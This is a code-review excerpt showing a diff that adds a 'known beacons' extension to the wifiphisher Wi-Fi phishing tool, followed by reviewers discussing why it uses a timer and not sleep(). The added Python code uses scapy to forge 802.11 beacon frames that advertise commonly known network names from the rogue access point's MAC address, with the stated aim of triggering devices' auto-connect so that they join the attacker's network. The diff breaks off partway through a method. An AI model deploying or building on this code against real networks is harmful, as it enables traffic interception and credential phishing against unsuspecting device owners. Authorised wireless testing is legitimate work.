wifiphisher/extensions/knownbeacons.py

```diff
@@ -0,0 +1,143 @@
+"""
+
+import logging
+import time
+from collections import defaultdict
+import wifiphisher.common.constants as constants
+import scapy.layers.dot11 as dot11
+
+logger = logging.getLogger(__name__)
+
+class Knownbeacons(object):
+    """
+    Sends a number of known beacons to trigger the Auto-Connect flag.
+    """
+
+    def __init__(self, shared_data):
+        """
+        Setup the class with all the given arguments
+
+        :param self: A Beacons object
+        :param data: Shared data from main engine
+        :type self: Beacons
+        :type data: dict
+        :return: None
+        :rtype: None
+        """
+
+        self.data = shared_data
+        # store channel to frame list
+        self._packets_to_send = defaultdict(list)
+        self._starttime = time.time()
+        self._msg = []
+        self._full_pkt_list = self._get_known_beacons()
+
+
+    def _get_known_beacons(self):
+
+        beacons = list()
+        essid = str()
+        bssid = self.data.rogue_ap_mac
+
+        # locate the known WLANS file
+        area_file = constants.KNOWN_WLANS_FILE
+
+        with open(area_file) as _file:
+            for line in _file:
+                if line.startswith("!"):
+                    continue
+                essid = line.rstrip() 
+
+                # craft the required packet parts
+                frame_part_0 = dot11.RadioTap()
+                frame_part_1 = dot11.Dot11(
+                    subtype=8,
+                    addr1=constants.WIFI_BROADCAST,
+                    addr2=bssid,
+                    addr3=bssid)
+                frame_part_2 = dot11.Dot11Beacon(cap=0x2105)
+                frame_part_3 = dot11.Dot11Elt(ID="SSID", info=essid)
+                frame_part_4 = dot11.Dot11Elt(
+                    ID="Rates", info=constants.AP_RATES)
+                frame_part_5 = dot11.Dot11Elt(ID="DSset", info=chr(7))
+
+                # create a complete packet by combining the parts
+                complete_frame = (
+                    frame_part_0 / frame_part_1 / frame_part_2 /
+                    frame_part_3 / frame_part_4 / frame_part_5)
+                # add the frame to the list
+                beacons.append(complete_frame)
+        return beacons
+
+    def get_packet(self, pkt):
+        """
+        We start broadcasting the beacons on the first received packet
+
+        :param self: A Knownbeacons object
+        :param packet: A scapy.layers.RadioTap object
+        :type self: Knownbeacons
+        :type packet: scapy.layers.RadioTap
+        :return: A tuple containing ["*"] followed by a list of
+            the crafted beacon frames
+        :rtype: tuple(list, list)
+        .. warning: pkt is not used here but should not be removed since
+            this prototype is requirement
+        """
+
+        # If INTERVAL seconds have passed...
+        if (time.time() - self._starttime > constants.KB_INTERVAL):
```

Comment:
can you explain why this is needed?

Reply:
This is because of the (2) addition that I mentioned above. We want to broadcast a specific number of beacons every number of seconds.

Reply:
cant you use sleep then?

Reply:
No, `sleep()` is forbidden within extensions. We run all extensions under a single thread. If we `sleep()` in one thread, it will pause the execution for all extensions.